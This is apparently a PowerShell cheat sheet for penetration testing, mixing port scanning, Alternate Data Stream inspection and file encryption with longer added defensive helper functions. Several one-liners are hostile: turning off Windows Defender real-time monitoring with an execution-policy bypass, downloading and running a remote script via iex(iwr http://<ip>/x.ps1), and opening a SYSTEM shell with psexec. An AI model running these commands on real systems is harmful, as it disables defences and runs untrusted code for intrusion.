Compact loop:

1,2,3,4 | % {write-host $_}

Scan selected ports:

22,53,80,443,445 | % { Test-NetConnection -ComputerName <ip> -Port $_ }
# PowerShell 7+ (Test-Connection has no -Port; it uses -TcpPort): 22,53,80,443,445 | % { Test-Connection -TargetName <ip> -TcpPort $_ }

Extract an archive (Expand-Archive needs PowerShell 5+; the .NET call below works on older versions):

Expand-Archive <>
Add-Type -assembly 'system.io.compression.filesystem';[io.compression.zipfile]::ExtractToDirectory("<archive path>","<target dir>")

Check for hidden streams:

Get-Item -Stream * <path>

Disable Windows Defender:

powershell.exe -exec bypass -command Set-MpPreference -DisableRealtimeMonitoring $true

Check for Constrained Language Mode:


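The entry above has no command under it. As an added example (my own code, not part of the original cheat sheet): the language-mode property itself, plus the two enforcement sources a defender usually checks when a session comes up as ConstrainedLanguage. Get-LanguageModeStatus is my own name; the Win32_DeviceGuard class under root\Microsoft\Windows\DeviceGuard and its status values (0 = off, 1 = audit, 2 = enforced) are assumed to be as documented for Windows 10 and later, and Get-AppLockerPolicy assumes the AppLocker module is present.

```powershell
# Added example (not from the original cheat sheet): report the session's language
# mode and the enforcement sources that normally cause ConstrainedLanguage
# (WDAC user-mode code integrity, AppLocker script rules).
function Get-LanguageModeStatus {
    $mode = $ExecutionContext.SessionState.LanguageMode   # the one-liner check
    $result = [ordered]@{
        LanguageMode    = $mode
        Constrained     = ($mode -ne 'FullLanguage')
        PSVersion       = $PSVersionTable.PSVersion.ToString()
        WdacUserMode    = 'unknown'
        AppLockerScript = 'unknown'
    }
    try {
        # Assumed class/namespace; UsermodeCodeIntegrityPolicyEnforcementStatus: 0 off, 1 audit, 2 enforced
        $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
                              -ClassName Win32_DeviceGuard -ErrorAction Stop
        $result.WdacUserMode = @{ 0 = 'off'; 1 = 'audit'; 2 = 'enforced' }[[int]$dg.UsermodeCodeIntegrityPolicyEnforcementStatus]
    } catch { }   # class absent on older builds: leave 'unknown'
    try {
        # Script rule collections are what make AppLocker drop PowerShell into ConstrainedLanguage
        $script = (Get-AppLockerPolicy -Effective -ErrorAction Stop).RuleCollections |
                  Where-Object RuleCollectionType -eq 'Script'
        $result.AppLockerScript = if ($script) { "$($script.Count) rule collection(s)" } else { 'none' }
    } catch { }   # AppLocker module missing: leave 'unknown'
    [pscustomobject]$result
}

Get-LanguageModeStatus
```

If you only want the mode, `$ExecutionContext.SessionState.LanguageMode` alone is enough; the rest tells you whether the restriction is a deliberate policy (and so will also apply to any new session) or a one-off.
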
Run a .ps1 in existing remote sessions:

Invoke-Command -FilePath <script> -Session $sessions
Enter-PSSession -Session $sess

Run cmd.exe as SYSTEM:

psexec.exe -i -s %SystemRoot%\system32\cmd.exe

File Transfer & Execution

iex(iwr http://<ip>/x.ps1 -usebasicparsing)

Prevent Output Truncation

| Ft -autosize -wrap
| fl

Encrypt files

# https://gallery.technet.microsoft.com/scriptcenter/EncryptDecrypt-files-use-65e7ae5d
$key = New-CryptographyKey -Algorithm AES
# Encrypt the file
Protect-File '.\secrets.txt' -Algorithm AES -Key $key -RemoveSource
# Decrypt the file
Unprotect-File '.\secrets.txt.AES' -Algorithm AES -Key $key -RemoveSource
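The Protect-File/Unprotect-File pair above comes from a gallery script. As an added example (my own code, not the gallery script and not from the original page), the same workflow done with only the .NET classes that ship with Windows PowerShell 5.1: AES-256-CBC with a fresh random IV per file, and, going beyond the gallery script, an HMAC-SHA256 tag over IV and ciphertext (encrypt-then-MAC) so a wrong key or a modified file is rejected before anything is decrypted. New-FileKey, Protect-FileAes and Unprotect-FileAes are my own names, the file layout (IV | ciphertext | tag) is my own choice, and the paths in the usage comment are placeholders.

```powershell
# Added example (not the gallery script): AES-256-CBC + HMAC-SHA256, .NET Framework only.
# Container layout: IV (16 bytes) | ciphertext (PKCS7 padded) | HMAC-SHA256 tag (32 bytes).

function New-FileKey {
    # 64 random bytes: first 32 are the AES-256 key, last 32 the HMAC key (never share one key for both)
    $key = New-Object byte[] 64
    $rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    $rng.GetBytes($key)
    $rng.Dispose()
    return ,$key    # leading comma stops PowerShell unrolling the array
}

function Protect-FileAes {
    param([Parameter(Mandatory)][string]$Path,
          [Parameter(Mandatory)][byte[]]$Key,
          [switch]$RemoveSource)
    if ($Key.Length -ne 64) { throw 'Key must be 64 bytes (use New-FileKey)' }
    # .NET resolves relative paths against the process directory, not the PowerShell location
    $full = (Resolve-Path -LiteralPath $Path).ProviderPath
    $aes  = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = [byte[]]$Key[0..31]
    $aes.GenerateIV()                       # fresh IV per file; reusing one with the same key leaks data
    $plain = [System.IO.File]::ReadAllBytes($full)
    $enc   = $aes.CreateEncryptor()
    $body  = [byte[]]($aes.IV + $enc.TransformFinalBlock($plain, 0, $plain.Length))
    $hmac  = [System.Security.Cryptography.HMACSHA256]::new([byte[]]$Key[32..63])
    $tag   = $hmac.ComputeHash($body)       # authenticates IV and ciphertext together
    $out   = "$full.aes"
    [System.IO.File]::WriteAllBytes($out, [byte[]]($body + $tag))
    $hmac.Dispose(); $enc.Dispose(); $aes.Dispose()
    if ($RemoveSource) { Remove-Item -LiteralPath $full }
    return $out
}

function Unprotect-FileAes {
    param([Parameter(Mandatory)][string]$Path,
          [Parameter(Mandatory)][byte[]]$Key,
          [switch]$RemoveSource)
    if ($Key.Length -ne 64) { throw 'Key must be 64 bytes (use New-FileKey)' }
    $full = (Resolve-Path -LiteralPath $Path).ProviderPath
    $data = [System.IO.File]::ReadAllBytes($full)
    if ($data.Length -lt 64) { throw 'File too short to be a valid container (IV + one block + tag)' }
    $n    = $data.Length - 32
    $body = [byte[]]$data[0..($n - 1)]
    $tag  = [byte[]]$data[$n..($data.Length - 1)]
    # Verify the tag before touching the ciphertext; compare in constant time
    $hmac     = [System.Security.Cryptography.HMACSHA256]::new([byte[]]$Key[32..63])
    $expected = $hmac.ComputeHash($body)
    $hmac.Dispose()
    $diff = 0
    for ($i = 0; $i -lt 32; $i++) { $diff = $diff -bor ($expected[$i] -bxor $tag[$i]) }
    if ($diff -ne 0) { throw 'HMAC mismatch: wrong key or the file was altered' }
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = [byte[]]$Key[0..31]
    $aes.IV  = [byte[]]$body[0..15]
    $dec   = $aes.CreateDecryptor()
    $plain = $dec.TransformFinalBlock($body, 16, $body.Length - 16)
    $out   = $full -replace '\.aes$', ''
    [System.IO.File]::WriteAllBytes($out, $plain)
    $dec.Dispose(); $aes.Dispose()
    if ($RemoveSource) { Remove-Item -LiteralPath $full }
    return $out
}

# Usage (placeholder paths); keep $key somewhere safe, the files are unrecoverable without it:
# $key = New-FileKey
# Protect-FileAes -Path '.\secrets.txt' -Key $key -RemoveSource
# Unprotect-FileAes -Path '.\secrets.txt.aes' -Key $key -RemoveSource
```

CBC plus HMAC is used here because .NET Framework, and therefore Windows PowerShell 5.1, has no AesGcm class; on PowerShell 7 an AEAD mode would do both jobs in one call. The tag check happens before decryption on purpose: with unauthenticated CBC, feeding tampered ciphertext to the decryptor is exactly what padding-oracle attacks exploit.
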

Alternate Data Stream (ADS)

powershell -command "get-item <file> -stream *"
powershell -command "get-content <file> -stream root.txt"
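The two one-liners above (and the "Check for hidden streams" entry earlier) inspect a single file. As an added example serving both entries (my own code, not part of the original cheat sheet), a sweep over a directory tree that lists every alternate data stream, skipping the default :$DATA stream and, unless asked, the ordinary mark-of-the-web stream, so what is left is worth a look. Find-AlternateStream is my own name and the paths in the usage comment are constructed.

```powershell
# Added example (not from the original cheat sheet): find files carrying alternate
# data streams under a directory. Zone.Identifier is the normal mark-of-the-web
# stream on downloaded files and is noise for this purpose, so it is hidden by default.
function Find-AlternateStream {
    param(
        [Parameter(Mandatory)][string]$Path,
        [switch]$IncludeZoneIdentifier
    )
    Get-ChildItem -LiteralPath $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            # -Stream * returns one object per stream, with FileName, Stream and Length
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue
        } |
        Where-Object { $_.Stream -ne ':$DATA' } |
        Where-Object { $IncludeZoneIdentifier -or $_.Stream -ne 'Zone.Identifier' } |
        Select-Object FileName, Stream, Length
}

# Usage (constructed paths):
# Find-AlternateStream -Path 'C:\Users\Public' | Format-Table -AutoSize -Wrap
# Get-Content -LiteralPath 'C:\Users\Public\report.txt' -Stream 'hidden.txt'
# Remove-Item -LiteralPath 'C:\Users\Public\report.txt' -Stream 'hidden.txt'   # drop a stream, keep the file
```

Because ':$DATA' is in single quotes PowerShell does not try to expand $DATA. Streams only survive on NTFS, so a file copied to FAT/exFAT or through most archive tools arrives without them, which is also why a stream vanishing is not evidence that it never existed.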